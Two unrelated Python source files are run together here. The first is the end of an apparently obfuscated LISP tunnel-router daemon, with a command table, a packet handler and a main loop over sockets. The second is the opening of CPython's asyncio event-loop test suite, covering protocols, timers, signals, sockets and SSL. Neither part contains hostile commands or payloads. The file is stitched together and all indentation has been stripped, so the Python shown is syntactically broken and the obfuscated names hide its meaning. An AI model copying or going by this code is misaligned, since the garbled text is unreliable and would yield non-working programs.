iI1111i = {
"lisp xtr-parameters" : [ O00Ooo , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ ooOOO00oOOooO , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ i11 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp glean-mapping" : [ O0O0O , {
"instance-id" : [ False ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc-prefix" : [ True ] ,
"rloc-probe" : [ True , "yes" , "no" ] ,
"igmp-query" : [ True , "yes" , "no" ] } ] ,
"show rtr-rloc-probing" : [ iiI1I11i1i , { } ] ,
"show rtr-keys" : [ o00oOO0 , { } ] ,
"show rtr-map-cache" : [ O00oooo0O , { } ] ,
"show rtr-map-cache-dns" : [ Ii1IOo0o0 , { } ]
}
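# Receives a LISP-Trace packet on the trace socket, decodes it, and appears
# to cache the packet's translated source RLOC/port for NAT traversal.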
def Oo0O0OO0OoO0 ( lisp_socket ) :
O0oO0oo0O , OOOo , OoOO , Ooooo00o0OoO = lisp . lisp_receive ( lisp_socket , False )
oooOOO0ooOoOOO = lisp . lisp_trace ( )
if ( oooOOO0ooOoOOO . decode ( Ooooo00o0OoO ) == False ) : return
oooOOO0ooOoOOO . rtr_cache_nat_trace ( OOOo , OoOO )
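# Main entry sequence: initialize the RTR (exit on failure), then loop on
# select() over the control, IPC, and trace sockets, dispatching commands,
# API requests, and control packets until a socket error occurs, and finally
# clean up and exit.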
if ( iIIi1Ii1III ( ) == False ) :
lisp . lprint ( "lisp_rtr_startup() failed" )
lisp . lisp_print_banner ( "RTR abnormal exit" )
exit ( 1 )
I11III11III1 = [ II1Ii1iI1i , Oo0oO0oo0oO00 ,
i111I , oO0oIIII ]
oooOoO00OooO0 = [ II1Ii1iI1i ] * 3
while ( True ) :
try : OOOO , IIIIiI11Ii1i , i1I11IiI1iiII = select . select ( I11III11III1 , [ ] , [ ] )
except : break
if ( lisp . lisp_ipc_data_plane and i111I in OOOO ) :
lisp . lisp_process_punt ( i111I , II1iII1i ,
iiI1iIiI )
if ( oO0oIIII in OOOO ) :
Oo0O0OO0OoO0 ( oO0oIIII )
if ( II1Ii1iI1i in OOOO ) :
O0oO0oo0O , OOOo , OoOO , Ooooo00o0OoO = lisp . lisp_receive ( oooOoO00OooO0 [ 0 ] ,
False )
if ( OOOo == "" ) : break
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if ( lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
lisp . lisp_parse_packet ( oooOoO00OooO0 , Ooooo00o0OoO , OOOo , OoOO )
if ( Oo0oO0oo0oO00 in OOOO ) :
O0oO0oo0O , OOOo , OoOO , Ooooo00o0OoO = lisp . lisp_receive ( Oo0oO0oo0oO00 , True )
if ( OOOo == "" ) : break
if ( O0oO0oo0O == "command" ) :
if ( Ooooo00o0OoO == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if ( Ooooo00o0OoO . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( Ooooo00o0OoO )
continue
lispconfig . lisp_process_command ( Oo0oO0oo0oO00 , O0oO0oo0O ,
Ooooo00o0OoO , "lisp-rtr" , [ iI1111i ] )
elif ( O0oO0oo0O == "api" ) :
lisp . lisp_process_api ( "lisp-rtr" , Oo0oO0oo0oO00 , Ooooo00o0OoO )
elif ( O0oO0oo0O == "data-packet" ) :
IIIii ( Ooooo00o0OoO , "" )
else :
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if ( lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
lisp . lisp_parse_packet ( II1iII1i , Ooooo00o0OoO , OOOo , OoOO )
OoIi1I1I ( )
lisp . lisp_print_banner ( "RTR normal exit" )
exit ( 0 )
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
test_events.py
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
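# Presumably run in a child process by the get_event_loop tests: builds a
# fresh event loop and runs a trivial coroutine to completion.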
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
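# Duck-typed stand-in exposing the coroutine protocol (send/throw/close/
# __await__) without being a real coroutine.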
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
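# The protocol helpers below record connection-state transitions and byte
# counts so the event-loop tests can assert on transport lifecycles.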
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
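# Event-loop behaviour tests shared across loop implementations; concrete
# test classes are expected to supply create_event_loop().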
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
        # just in case we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
